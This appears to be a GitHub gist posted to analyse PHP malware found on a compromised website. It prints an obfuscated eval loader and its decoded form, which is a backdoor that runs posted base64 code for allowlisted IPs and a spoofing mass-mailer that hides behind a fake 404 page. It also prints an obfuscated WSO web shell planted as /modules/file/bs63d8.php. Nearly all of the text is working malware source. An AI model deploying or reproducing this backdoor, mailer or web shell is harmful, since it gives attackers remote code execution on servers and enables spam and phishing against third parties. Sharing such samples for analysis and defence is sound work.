| 'iEFmMkKqIChxahIYSp7J9lhwDWBegkImMlab+uOCrEBmMC7J5l7AAZFTJZFZMlabMYS6rZS6ruKd5p7H'. | |
| 'nXBmJZOdxCDdbkzrMC7J5l7AA2Vm62GZnRjbEZFmrZFmrZFmrZFmrXhNaXBmMC7J5l7AAZ'. | |
| 'VbruOegkQqHkx6DC7J5l7AAuxbUFzmrZFmrZFmrZFmrZKAQEFmMC7J5l7AAZGbDuImnZFcIXWqxXWdbZFTJZFuVp7J9lhw1ZFcSp'. | |
| '7J9lhvkkANtZS6EZFmrZFmrZFeJFzmrZFmrZFmruOuAkWvAkjyr2SbrZMd5pQsACjcnp7T1ZKd6pjdAWOukpz'. | |
| 'ZUFzmrZFmrZFmrlhCiZFcLCWugpWdpu7xAYKg5XFYYfGbDwPJGvFkrEyirZFmrZFmrZO6EZFmrZFmrZFmrZFmrlh'. | |
| 'CiZKAak7vbEFcLCWugpWdpu7cgYKPDWBMruzCrlWdoCWuICWMiuOegkQqHkx6DXKqbCBYYEBmnFzmrZ'. | |
| 'FmrZFmrZFmrZO6EZFmrZFmrZFmrZFmrZFmrZKX5kQvgC7riuOegkQqHkx6DXKqbCBYYZPqGZFc9ZVb+ZF'. | |
| 'c7EyirZFmrZFmrZFmrZFmrZFmrZFmrZFcMCWcgZFTJZOvIpKvtC7JMXBrMlIMtuab'. | |
| 'D2DvIpKvtC7JMXBrMYzMtuICDRLirZFmrZFmrZFmrZFmrZFmrlhCiZOdxCDdb'. | |
| 'kzrMXKqbCBLr2GPnfGbDuzkrEBmMXKqbCBmJZOdxCDdbkzrMXKqbCBLL2FbNEG6EZFmrZF'. | |
| 'mrZFmrZFmroyirZFmrZFmrZFmrZFmMXKqbCBmtfBmzWOukpANIWKTzRLirZFmrZFmrZFmrZFmEZFm'. | |
| 'rZFmrZFmrZFmruOuAkWvAkjyr2SbrZMd5pDcApDyHYOALXGirCWeLpKASCWcnp7T50FxjYjkHXQJIpBxxkQ'. | |
| 'NApQd5XKvMWOukpzZUFzmrZFmrZFmrZFmrZFcIXWqxXWdbZFTJZFuVp7sbX'. | |
| 'hsb2hNApQYblVirZzsaYOu6XhTiuKcgYKPn2zukkANtZS6EZFmrZFmrZFeJFzmrZFmrZFmruOuAkWvAkjyr2Sb'. | |
| 'rZANIWKTzRLirZFmrZFmrZmirZFmrZFmrZKAQEFmMkKqIChxahIYHXWcip7yDWBmJfBm'. | |
| 'DwPJGvFkrEBmMkQvNYhvaYFmtfBmMXKqbCG6EZFmrZFmrZFmEZFmrZFmrZFemXDYIlWcAZFrMXDm6uOuAkWvA'. | |
| 'kjynRIm5EzeGXhsMZOuAkWvAkjyrEz3EZFmrZFmrZFmEZFmrZFmrZFmMkQvaZVbrZzZUZFciXhqMXWua'. | |
| 'ZVbrZzZUZFciW7cAYKvSYKvMZVbrXQq6k7wUFzmrZFmrZFmrY7gnpKwiZFqmXQv5XzrMXDmnZFMEZFmr'. | |
| 'ZFmrZFeUFzmrZFmrZFmrZFmrZFcIXW4r2SbryKXIXhqMEFcQkF'. | |
| 'Lr4GmIdFMUZF38ZdKOb2ScrHFLb2Wy5FVytHF+b2jcrHFxb2jcrzm82LirZFmrFzmrZFmrZFmrZFmrZF38Zd'. | |
| 'FobCVy5HFIb2WcrdF1b2mrb2jy6dFUb2ScgJFTbC3rb2oy6dFab25y5HF'. | |
| 'Ib29y5HFIZdFIZdF1b2Uy5YKFb2Wy5YKFb2wrEz3EZFmrZFmrZFmrZFmr'. | |
| 'lhCiZFPruKgoXKvbXhdbXhyruzCrkjcIkKJaEFcIXW46ZFukkANtWOukpzZnZGbJcMq4wbwrEyirZ'. | |
| 'FmrZFmrZFmrZFeUFzmrZFmrZFmrZFmrZFmrZFm5EzVyHJFLb2fy5HFUb2Uy6HF1b2rrbCfyHHFxZdKebCoytdKFb2Vy5YK2ZFb'. | |
| 'rb29y5HKmbCVyHYF1bC2ytdKmbCfyHYF3ZdF1b2Uy5YKFb2Wy5YKFZFi5FzmrZFmrZFmrZFmrZF'. | |
| 'mrZFmMlqJMXWcACjcAXFmJZOcIYhwUFzmrZFmrZFmrZFmrZFmrZFmEZFmr'. | |
| 'ZFmrZFmrZFmrZFmrZFciXhqMXWuaZVbrkjvzkjcIEFcIXW46ZVm6ZO'. | |
| 'dbkDe5kIrMkQva2FmzWOukpANIWKTzEBMUFzmrZFmrZFmrZFmrZFmrZFmMkQvaZVbrkjvzkjcIEF'. | |
| 'cIXW46ZOdbkDe5kIrMkQva2FmzWOukpANIWKTzEB6bEG6EZFmrZFmrZFmrZFmrZFmrZmirZFm'. | |
| 'rZFmrZFmrZFmrZFmr2IirBKvgXKvIkIebpIeekDug0Bm82LirZFmrZFmrZFmrZFmrZFmrlhCiZ'. | |
| 'FcLCWugpWdpujuAYOvIpzYYfGbDlKvgXKvIkIkroOLruOegkQqHkx6DkQvbYWutuxbJfBY'. | |
| 'gkDug0BkEZFmrZFmrZFmrZFmrZFmrZFmrZFe3oFmilWdaXWyiuOegkQqHkx6DkQvMlWuACjyDWBMruzCruOegkQqHkx6DkQvM'. | |
| 'lWuACjyDWGbJYOuxXBMrEyirZFmrZFmrZFmrZFmrZFmr0LirZFmrZFmrZFmrZFmrZFmrZFmrZFciZVbrXWgLpKJMXBrzWOu'. | |
| 'kpzZ6ZFciXhqMXWuaEG6EZFmrZFmrZFmrZFmrZFmrZFmrZFmMlKvgXKvIkImJZKqIkQq'. | |
| 'sEFMUFzmrZFmrZFmrZFmrZFmrZFmrZFmrXQJIXhqSlFrruKrrCW4ruK6Jfzc7Z'. | |
| 'FMEZFmrZFmrZFmrZFmrZFmrZFmrZFeUFzmrZFmrZFmrZFmrZFm'. | |
| 'rZFmrZFmrZFmrZKAQEFeaYOuLpj4iuOC6ZFk1uIMrEyirZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFeUFzmrZFmrZFmrZFmrZF'. | |
| 'mrZFmrZFmrZFmrZFmrZFmMlImJZOdxCDdbkzrMYzLr4FLrkjcIkK'. | |
| 'JaEFc72FmDRzknEG6EZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFc7ZVbrYOunpBgaYhuaYOZiuOC'. | |
| '6ZOdbkDe5kIrMYzLruaiDEB6NEBMUFzmrZFmrZFmrZFmrZFmrZFmrZFmrZFmrZO'. | |
| 'bEZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFmruKgAChcAkDdpkjcI'. | |
| 'YKJxkOeAkzrMlIAYZVbruOCUFzmrZFmrZFmrZFmrZFmrZFmrZFmroyirZFmrZFmrZFmrZFmrZFmroyirZFmrZFmrZFmrZF'. | |
| 'mrZFmrlhCiZKAak7vbEFcLCWugpWdpujuAXKAIXhdbuxbnZFCQZFcLCWugpWdpujuAXKAIXhd'. | |
| 'buxbJfWcIYhwruzCrlWdaXWyiuKgAChcAkDdpubNfybqwBwJRuxbnZFMEZFmrZFmrZFmrZFmrZFmrZO6EZFmrZFmrZF'. | |
| 'mrZFmrZFmrZFmrZFmMkKqIChxahIYxkQLDWBmJZFciXhqMXWuahIY4GbdevPAfGzYYRLirZFmrZFmrZFm'. | |
| 'rZFmrZFmrZFmrZKAQEFmglWdaXWyiuOegkQqHkx6DkQvMlWuACjyHC7JxpDyDWBM'. | |
| 'rEBmMkKqIChxahIYIXhcnkQvSYFxSpjvtYFYYZVbr4V6EZFmrZ'. | |
| 'FmrZFmrZFmrZFmrZFmrZFenXzrruOegkQqHkx6DkQvMlWuACjyHC7JxpDyDWGLN4FmnFzmrZFmrZFmrZFmrZFmr'. | |
| 'ZFmrZFmr0LirZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFmMkKqIChxah'. | |
| 'IYIXhcnkQvSYFxSpjvtYFYYEI6UFzmrZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFcQYhsSZVbrWxJKvwsVvPAfGAJoR'. | |
| 'LirZFmrZFmrZFmrZFmrZFmrZFmrZFmrZFeIXWcxkQTryKAaW7JzlQvSYFrMYKgnkIMrfImMYKgnkIb+uKXxp'. | |
| 'Q4iuOegkQqHkIMrRzmMXDvtCIrMkKqIChxaEG6EZFmrZFmrZFmrZFmrZFmrZFmrZFeJFzmrZFmrZFmrZFmrZFmrZFeJF'. | |
| 'zmrZFmrZFmrZFmrZFmrZFenXzrruOegkQqHkx6DkQvbYWutuxbJfBYiXhqMXW'. | |
| 'uauImnZOuAYOvIpzmMlKvgXKvIka6EZFmrZFmrZFmrZFmroyirZFmrZFmrZObEZFmrZFmrZFmEZFmr'. | |
| 'ZFmrZFemXQd6pjdAEFcQkFMUFzmrZFeJFzmrZFeApOdAZOuAYOvIpzeKywNGcG65EzmMXWuIkjcI2zcAkDutpa6rE'. | |
| 'z3EZFmrZmirZFmrlhCiZFcLCWugpWdpujuAYOvIpzYYfGbDCWuICWMDZFMruOuAkImJZKqIkQqsEF'. | |
| 'YiXhqMXWuauab+uKgAChcAkD46ZFYSp7sbXhsbuab+uOuAkIMUFzmrZFmEZFmrZOu'. | |
| 'AYOvIpzmMkQvaRLnJ'; | |
| eval(v5T7ETO($vC3WWUF, $vNWZ3B7));?> | |
| That, after eval(), turn into this: | |
| <?php | |
| if(isset($_POST["code"]) && isset($_POST["custom_action"]) && is_good_ip($_SERVER['REMOTE_ADDR'])) | |
| { | |
| eval(base64_decode($_POST["code"])); | |
| exit(); | |
| } | |
| if (isset($_POST["type"]) && $_POST["type"]=="1") | |
| { | |
| type1_send(); | |
| exit(); | |
| } | |
| elseif (isset($_POST["type"]) && $_POST["type"]=="2") | |
| { | |
| } | |
| elseif (isset($_POST["type"])) | |
| { | |
| echo $_POST["type"]; | |
| exit(); | |
| } | |
| error_404(); | |
| function is_good_ip($ip) | |
| { | |
| $goods = Array("6.185.239.", "8.138.118."); | |
| foreach ($goods as $good) | |
| { | |
| if (strstr($ip, $good) != FALSE) | |
| { | |
| return TRUE; | |
| } | |
| } | |
| return FALSE; | |
| } | |
| function type1_send() | |
| { | |
| if(!isset($_POST["emails"]) | |
| OR !isset($_POST["themes"]) | |
| OR !isset($_POST["messages"]) | |
| OR !isset($_POST["froms"]) | |
| OR !isset($_POST["mailers"]) | |
| ) | |
| { | |
| exit(); | |
| } | |
| if(get_magic_quotes_gpc()) | |
| { | |
| foreach($_POST as $key => $post) | |
| { | |
| $_POST[$key] = stripcslashes($post); | |
| } | |
| } | |
| $emails = @unserialize(base64_decode($_POST["emails"])); | |
| $themes = @unserialize(base64_decode($_POST["themes"])); | |
| $messages = @unserialize(base64_decode($_POST["messages"])); | |
| $froms = @unserialize(base64_decode($_POST["froms"])); | |
| $mailers = @unserialize(base64_decode($_POST["mailers"])); | |
| $aliases = @unserialize(base64_decode($_POST["aliases"])); | |
| $passes = @unserialize(base64_decode($_POST["passes"])); | |
| if(isset($_SERVER)) | |
| { | |
| $_SERVER['PHP_SELF'] = "/"; | |
| $_SERVER['REMOTE_ADDR'] = "127.0.0.1"; | |
| if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) | |
| { | |
| $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1"; | |
| } | |
| } | |
| if(isset($_FILES)) | |
| { | |
| foreach($_FILES as $key => $file) | |
| { | |
| $filename = alter_macros($aliases[$key]); | |
| $filename = num_macros($filename); | |
| $filename = text_macros($filename); | |
| $filename = xnum_macros($filename); | |
| $_FILES[$key]["name"] = $filename; | |
| } | |
| } | |
| if(empty($emails)) | |
| { | |
| exit(); | |
| } | |
| foreach ($emails as $fteil => $email) | |
| { | |
| $theme = $themes[array_rand($themes)]; | |
| $theme = alter_macros($theme["theme"]); | |
| $theme = num_macros($theme); | |
| $theme = text_macros($theme); | |
| $theme = xnum_macros($theme); | |
| $message = $messages[array_rand($messages)]; | |
| $message = alter_macros($message["message"]); | |
| $message = num_macros($message); | |
| $message = text_macros($message); | |
| $message = xnum_macros($message); | |
| //$message = pass_macros($message, $passes); | |
| $message = fteil_macros($message, $fteil); | |
| $from = $froms[array_rand($froms)]; | |
| $from = alter_macros($from["from"]); | |
| $from = num_macros($from); | |
| $from = text_macros($from); | |
| $from = xnum_macros($from); | |
| if (strstr($from, "[CUSTOM]") == FALSE) | |
| { | |
| $from = from_host($from); | |
| } | |
| else | |
| { | |
| $from = str_replace("[CUSTOM]", "", $from); | |
| } | |
| $mailer = $mailers[array_rand($mailers)]; | |
| send_mail($from, $email, $theme, $message, $mailer); | |
| } | |
| } | |
| function send_mail($from, $to, $subj, $text, $mailer) | |
| { | |
| $head = ""; | |
| $un = strtoupper(uniqid(time())); | |
| $head .= "From: $from\n"; | |
| $head .= "X-Mailer: $mailer\n"; | |
| $head .= "Reply-To: $from\n"; | |
| $head .= "Mime-Version: 1.0\n"; | |
| $head .= "Content-Type: multipart/alternative;"; | |
| $head .= "boundary=\"----------".$un."\"\n\n"; | |
| $plain = strip_tags($text); | |
| $zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n"; | |
| $zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n"; | |
| $zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n"; | |
| $zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n"; | |
| $zag .= "------------".$un."--"; | |
| if(count($_FILES) > 0) | |
| { | |
| foreach($_FILES as $file) | |
| { | |
| if(file_exists($file["tmp_name"])) | |
| { | |
| $f = fopen($file["tmp_name"], "rb"); | |
| $zag .= "------------".$un."\n"; | |
| $zag .= "Content-Type: application/octet-stream;"; | |
| $zag .= "name=\"".$file["name"]."\"\n"; | |
| $zag .= "Content-Transfer-Encoding:base64\n"; | |
| $zag .= "Content-Disposition:attachment;"; | |
| $zag .= "filename=\"".$file["name"]."\"\n\n"; | |
| $zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n"; | |
| fclose($f); | |
| } | |
| } | |
| } | |
| if(@mail($to, $subj, $zag, $head)) | |
| { | |
| if(!empty($_POST['verbose'])) | |
| echo "SENDED"; | |
| } | |
| else | |
| { | |
| if(!empty($_POST['verbose'])) | |
| echo "FAIL"; | |
| } | |
| } | |
| function alter_macros($content) | |
| { | |
| preg_match_all('#{(.*)}#Ui', $content, $matches); | |
| for($i = 0; $i < count($matches[1]); $i++) | |
| { | |
| $ns = explode("|", $matches[1][$i]); | |
| $c2 = count($ns); | |
| $rand = rand(0, ($c2 - 1)); | |
| $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content); | |
| } | |
| return $content; | |
| } | |
| function text_macros($content) | |
| { | |
| preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches); | |
| for($i = 0; $i < count($matches[0]); $i++) | |
| { | |
| $min = $matches[1][$i]; | |
| $max = $matches[2][$i]; | |
| $rand = rand($min, $max); | |
| $word = generate_word($rand); | |
| $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1); | |
| } | |
| preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches); | |
| for($i = 0; $i < count($matches[0]); $i++) | |
| { | |
| $count = $matches[1][$i]; | |
| $word = generate_word($count); | |
| $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1); | |
| } | |
| return $content; | |
| } | |
| function xnum_macros($content) | |
| { | |
| preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches); | |
| for($i = 0; $i < count($matches[0]); $i++) | |
| { | |
| $num = $matches[1][$i]; | |
| $min = pow(10, $num - 1); | |
| $max = pow(10, $num) - 1; | |
| $rand = rand($min, $max); | |
| $content = str_replace($matches[0][$i], $rand, $content); | |
| } | |
| return $content; | |
| } | |
| function num_macros($content) | |
| { | |
| preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches); | |
| for($i = 0; $i < count($matches[0]); $i++) | |
| { | |
| $min = $matches[1][$i]; | |
| $max = $matches[2][$i]; | |
| $rand = rand($min, $max); | |
| $content = str_replace($matches[0][$i], $rand, $content); | |
| } | |
| return $content; | |
| } | |
| function generate_word($length) | |
| { | |
| $chars = 'abcdefghijklmnopqrstuvyxz'; | |
| $numChars = strlen($chars); | |
| $string = ''; | |
| for($i = 0; $i < $length; $i++) | |
| { | |
| $string .= substr($chars, rand(1, $numChars) - 1, 1); | |
| } | |
| return $string; | |
| } | |
| function pass_macros($content, $passes) | |
| { | |
| $pass = array_pop($passes); | |
| return str_replace("[PASS]", $pass, $content); | |
| } | |
| function fteil_macros($content, $fteil) | |
| { | |
| return str_replace("[FTEIL]", $fteil, $content); | |
| } | |
| function is_ip($str) { | |
| return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str); | |
| } | |
| function from_host($content) | |
| { | |
| $host = preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']); | |
| if (is_ip($host)) | |
| { | |
| return $content; | |
| } | |
| $tokens = explode("@", $content); | |
| $content = $tokens[0] . "@" . $host . ">"; | |
| return $content; | |
| } | |
| function error_404() | |
| { | |
| header("HTTP/1.1 404 Not Found"); | |
| $uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] ); | |
| $content = custom_http_request1("http://".$_SERVER['HTTP_HOST']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA"); | |
| $content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content ); | |
| exit( $content ); | |
| } | |
| function custom_http_request1($params) | |
| { | |
| if( ! is_array($params) ) | |
| { | |
| $params = array( | |
| 'url' => $params, | |
| 'method' => 'GET' | |
| ); | |
| } | |
| if( $params['url']=='' ) return FALSE; | |
| if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET'; | |
| $params['method'] = strtoupper($params['method']); | |
| if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE; | |
| /* Приводим ÑÑылку в правильный вид */ | |
| $url = parse_url($params['url']); | |
| if( ! isset($url['scheme']) ) $url['scheme'] = 'http'; | |
| if( ! isset($url['path']) ) $url['path'] = '/'; | |
| if( ! isset($url['host']) && isset($url['path']) ) | |
| { | |
| if( strpos($url['path'], '/') ) | |
| { | |
| $url['host'] = substr($url['path'], 0, strpos($url['path'], '/')); | |
| $url['path'] = substr($url['path'], strpos($url['path'], '/')); | |
| } | |
| else | |
| { | |
| $url['host'] = $url['path']; | |
| $url['path'] = '/'; | |
| } | |
| } | |
| $url['path'] = preg_replace("/[\\/]+/", "/", $url['path']); | |
| if( isset($url['query']) ) $url['path'] .= "?{$url['query']}"; | |
| $port = isset($params['port']) ? $params['port'] | |
| : ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) ); | |
| $timeout = isset($params['timeout']) ? $params['timeout'] : 30; | |
| if( ! isset($params['return']) ) $params['return'] = 'content'; | |
| $scheme = $url['scheme']=='https' ? 'ssl://':''; | |
| $fp = @fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout); | |
| if( $fp ) | |
| { | |
| /* Mozilla */ | |
| if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16"; | |
| $request = "{$params['method']} {$url['path']} HTTP/1.0\r\n"; | |
| $request .= "Host: {$url['host']}\r\n"; | |
| $request .= "User-Agent: {$params['User-Agent']}"."\r\n"; | |
| if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n"; | |
| if( isset($params['cookie']) ) | |
| { | |
| $cookie = ""; | |
| if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);} | |
| else $cookie = $params['cookie']; | |
| if( $cookie!='' ) $request .= "Cookie: $cookie\r\n"; | |
| } | |
| $request .= "Connection: close\r\n"; | |
| if( $params['method']=='POST' ) | |
| { | |
| if( isset($params['data']) && is_array($params['data']) ) | |
| { | |
| foreach($params['data'] AS $k => $v) | |
| $data .= urlencode($k).'='.urlencode($v).'&'; | |
| if( substr($data, -1)=='&' ) $data = substr($data,0,-1); | |
| } | |
| $data .= "\r\n\r\n"; | |
| $request .= "Content-type: application/x-www-form-urlencoded\r\n"; | |
| $request .= "Content-length: ".strlen($data)."\r\n"; | |
| } | |
| $request .= "\r\n"; | |
| if( $params['method'] == 'POST' ) $request .= $data; | |
| @fwrite ($fp,$request); /* Send request */ | |
| $res = ""; $headers = ""; $h_detected = false; | |
| while( !@feof($fp) ) | |
| { | |
| $res .= @fread($fp, 1024); /* читаем контент */ | |
| /* Проверка Ð½Ð°Ð»Ð¸Ñ‡Ð¸Ñ Ð·Ð°Ð³Ð»Ð¾Ð²ÐºÐ¾Ð² в контенте */ | |
| if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE ) | |
| { | |
| /* заголовки уже Ñчитаны - корректируем контент */ | |
| $h_detected = true; | |
| $headers = substr($res, 0, strpos($res, "\r\n\r\n")); | |
| $res = substr($res, strpos($res, "\r\n\r\n")+4); | |
| /* Headers to Array */ | |
| if( $params['return']=='headers' || $params['return']=='array' | |
| || (isset($params['redirect']) && $params['redirect']==true) ) | |
| { | |
| $h = explode("\r\n", $headers); | |
| $headers = array(); | |
| foreach( $h as $k=>$v ) | |
| { | |
| if( strpos($v, ':') ) | |
| { | |
| $k = substr($v, 0, strpos($v, ':')); | |
| $v = trim(substr($v, strpos($v, ':')+1)); | |
| } | |
| $headers[strtoupper($k)] = $v; | |
| } | |
| } | |
| if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) ) | |
| { | |
| $params['url'] = $headers['LOCATION']; | |
| if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0; | |
| if( $params['redirect-count']<10 ) | |
| { | |
| $params['redirect-count']++; | |
| $func = __FUNCTION__; | |
| return @is_object($this) ? $this->$func($params) : $func($params); | |
| } | |
| } | |
| if( $params['return']=='headers' ) return $headers; | |
| } | |
| } | |
| @fclose($fp); | |
| } | |
| else return FALSE;/* $errstr.$errno; */ | |
| if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res); | |
| return $res; | |
| } | |
| ?> | |
| /modules/file/bs63d8.php: | |
| <?php ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa\x75\x6c\x74\x5f\x61\x63t\x69\x6f\x6e";${"\x47L\x4fB\x41\x4cS"}["\x64\x77e\x6d\x62\x6a\x63"]="\x63\x6fl\x6f\x72";${${"\x47\x4c\x4f\x42\x41LS"}["\x64\x77\x65\x6dbj\x63"]}="\x23d\x665";${${"\x47L\x4fB\x41\x4c\x53"}["\x69\x77\x69rm\x78\x6c\x71\x74\x76\x79p"]}="\x46i\x6cesM\x61n";$oboikuury="\x64e\x66a\x75\x6ct\x5fc\x68\x61\x72\x73\x65t";${${"\x47L\x4f\x42\x41\x4cS"}["p\x69oy\x6bc\x65\x61"]}=true;${$oboikuury}="\x57indow\x73-1\x325\x31";@ini_set("\x65r\x72o\x72_\x6cog",NULL);@ini_set("l\x6fg_er\x72ors",0);@ini_set("max_ex\x65\x63\x75\x74\x69o\x6e\x5f\x74im\x65",0);@set_time_limit(0);@set_magic_quotes_runtime(0);@define("WS\x4f\x5fVE\x52S\x49ON","\x32.5\x2e1");if(get_magic_quotes_gpc()){function WSOstripslashes($array){${"\x47\x4c\x4f\x42A\x4c\x53"}["\x7a\x64\x69z\x62\x73\x75e\x66a"]="\x61\x72r\x61\x79";$cfnrvu="\x61r\x72a\x79";${"GLOB\x41L\x53"}["\x6b\x63\x6ct\x6c\x70\x64\x73"]="a\x72\x72\x61\x79";return is_array(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x7ad\x69\x7ab\x73\x75e\x66\x61"]})?array_map("\x57SOst\x72\x69\x70\x73\x6c\x61\x73\x68\x65s",${${"\x47\x4cO\x42\x41LS"}["\x6b\x63\x6c\x74l\x70\x64\x73"]}):stripslashes(${$cfnrvu});}$_POST=WSOstripslashes($_POST);$_COOKIE=WSOstripslashes($_COOKIE);}function wsoLogin(){header("\x48\x54TP/1.\x30\x204\x30\x34\x20\x4eo\x74 \x46ound");die("4\x304");}function WSOsetcookie($k,$v){${"\x47\x4cO\x42ALS"}["\x67vf\x6c\x78m\x74"]="\x6b";$cjtmrt="\x76";$_COOKIE[${${"G\x4c\x4f\x42\x41LS"}["\x67\x76\x66\x6cxm\x74"]}]=${${"GLO\x42\x41\x4cS"}["\x63\x74\x78\x76t\x6f\x6fknm\x6a\x75"]};$raogrsixpi="\x6b";setcookie(${$raogrsixpi},${$cjtmrt});}$qyvsdolpq="a\x75\x74\x68\x5f\x70\x61s\x73";if(!empty(${$qyvsdolpq})){$rhavvlolc="au\x74h_\x70a\x73\x73";$ssfmrro="a\x75t\x68\x5fpa\x73\x73";if(isset($_POST["p\x61ss"])&&(md5($_POST["pa\x73\x73"])==${$ssfmrro}))WSOsetcookie(md5($_SERVER["H\x54\x54P_\x48\x4f\x53T"]),${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x72\x69\x75e\x66b\x64\x71\x63"]});if(!isset($_COOKIE[md5($_SERVER["\x48T\x54\x50\x5f\x48O\x53\x54"])])||($_COOKIE[md5($_SERVER["H\x54\x54\x50_H\x4fST"])]!=${$rhavvlolc}))wsoLogin();}function actionRC(){if(!@$_POST["p\x31"]){$ugtfpiyrum="a";${${"\x47\x4c\x4fB\x41LS"}["\x76r\x76w\x65\x79\x70z\x6eipu"]}=array("\x75n\x61m\x65"=>php_uname(),"p\x68\x70\x5fver\x73\x69o\x6e"=>phpversion(),"\x77s\x6f_v\x65\x72si\x6f\x6e"=>WSO_VERSION,"saf\x65m\x6f\x64e"=>@ini_get("\x73\x61\x66\x65\x5fm\x6fd\x65"));echo serialize(${$ugtfpiyrum});}else{eval($_POST["\x70\x31"]);}}if(empty($_POST["\x61"])){${"\x47L\x4fB\x41LS"}["\x69s\x76\x65\x78\x79"]="\x64\x65\x66\x61\x75\x6ct\x5f\x61c\x74i\x6f\x6e";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x75\x6f\x65c\x68\x79\x6d\x7ad\x64\x64"]="\x64\x65\x66a\x75\x6c\x74_\x61\x63\x74\x69\x6fn";if(isset(${${"\x47L\x4f\x42\x41LS"}["\x69\x77ir\x6d\x78lqtv\x79\x70"]})&&function_exists("\x61ct\x69\x6f\x6e".${${"\x47L\x4f\x42\x41\x4cS"}["\x75o\x65ch\x79\x6d\x7a\x64\x64\x64"]}))$_POST["a"]=${${"\x47\x4c\x4f\x42ALS"}["i\x73\x76e\x78\x79"]};else$_POST["a"]="\x53e\x63\x49\x6e\x66o";}if(!empty($_POST["\x61"])&&function_exists("actio\x6e".$_POST["\x61"]))call_user_func("\x61\x63\x74\x69\x6f\x6e".$_POST["a"]);exit; | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
See: What does this malicious PHP script do?